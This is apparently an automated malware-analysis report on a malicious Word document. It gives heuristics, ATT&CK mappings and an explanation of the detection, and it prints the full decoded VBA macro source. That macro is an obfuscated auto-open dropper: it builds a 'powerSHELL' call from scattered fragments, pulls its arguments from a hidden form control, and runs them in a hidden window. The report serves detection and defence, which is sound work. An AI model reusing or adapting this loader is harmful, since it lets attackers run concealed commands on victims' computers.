Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open auto-execution macro, a common technique for initial execution. The critical heuristic for a Shell() call in VBA indicates that the macro attempts to execute commands: HzoXW wraps Shell(q372K, False), and a window style of False (0, vbHide) means the spawned process runs without a visible window. The command string is assembled from fragments spread across several modules in the extracted source: DsEqD() returns "p", NAnoNR is "ow", the argument "er" is passed into w() from Document_Open, and zWa41Lq2Q is "SHE" & "LL ", which concatenate in that order to "powerSHELL ". The arguments appended after it come from K1nCIfmh, which reads the Text property of a control on the UserForm f, so the actual PowerShell command line is stored in the form's storage rather than in the visible macro source. The result is a hidden PowerShell invocation, likely intended to download and execute a secondary payload. The ClamAV detection further supports its malicious nature.
Heuristics (6)

- ClamAV: Doc.Malware.Sagent-6846843-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-6846843-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed below was found in the document text (OLE body), none was reached by the macro code, and all of them are XML namespace identifiers (XMP, RDF, Dublin Core, Adobe image metadata, DrawingML) of the kind embedded in image and drawing metadata, not network indicators.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2147 bytes |

SHA-256 of macros.bas: 8afbd2e148897d3e2a290a161e2586356b675f88f142d5878bc80f93646ddbbd
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim lEtUSFy(7 To 153) As String
lEtUSFy(7) = "a6H2s"
Dim iYr4X1Jxt(7 To 153) As String
iYr4X1Jxt(7) = "m8N0hM"
Dim U5GbeKjrI(14 To 88) As Long
U5GbeKjrI(14) = -114 + 238
Dim jTRhfB9iE(1 To 59) As String
jTRhfB9iE(1) = "ppKwq"
Call w("er")
End Sub
Attribute VB_Name = "QfAlPia"
Sub w(FWtswA)
Dim MsmW8h(5 To 232) As String
MsmW8h(5) = "WL8SE"
Dim nsQV6p
nsQV6p = DcoaZzG
Dim JJvbWd As Long
JJvbWd = (1081 - 1063) / (9)
Dim ry86O5Mt(16 To 47) As String
ry86O5Mt(16) = "qj0VQ3YA"
zWa41Lq2Q = "SHE" & "LL "
NAnoNR = "ow"
XmL4o8 = FWtswA
Dim C7MSyfbz(11 To 39) As Long
C7MSyfbz(11) = 21384 / 198
HzoXW DsEqD() & NAnoNR & XmL4o8 & zWa41Lq2Q & K1nCIfmh
End Sub
Attribute VB_Name = "TL3ADZOM"
Public Function DsEqD() As String
Dim U5wGQl As Long
U5wGQl = (21822 / 7274) / (37)
Dim bBxQGcbr As String
bBxQGcbr = Awtzg1ucq
Dim RBLMn(4 To 99) As Long
RBLMn(4) = 267 - 36
Dim sOFwMYkBn(11 To 101) As Long
sOFwMYkBn(11) = 15265 / 71
Dim m3CfSx
m3CfSx = TvNWcQ8
Dim UOLGe As String
UOLGe = t1UXxB
DsEqD = "p"
End Function
Function HzoXW(q372K)
HzoXW = Shell(q372K, False)
End Function
Attribute VB_Name = "MzPONdl"
Public Function K1nCIfmh()
Dim Mb23Vm5 As Object
Set Mb23Vm5 = New f
Dim dh5i6 As String
Dim MtamZgO1 As Long
MtamZgO1 = (1396 - 1389) * (10)
dh5i6 = Mb23Vm5.de.Text
Dim omYTKHX As String
omYTKHX = MXhCE
Dim sUqJFPY As Long
sUqJFPY = (1065 - 1052) * (13)
Dim wQcsJd As Long
wQcsJd = (6972 / 249) / (26)
K1nCIfmh = dh5i6
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{7EB83F0D-8243-47CE-B7BA-B48F9901F585}{8910233A-51CC-4E9E-AD7B-CD9B7A416385}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```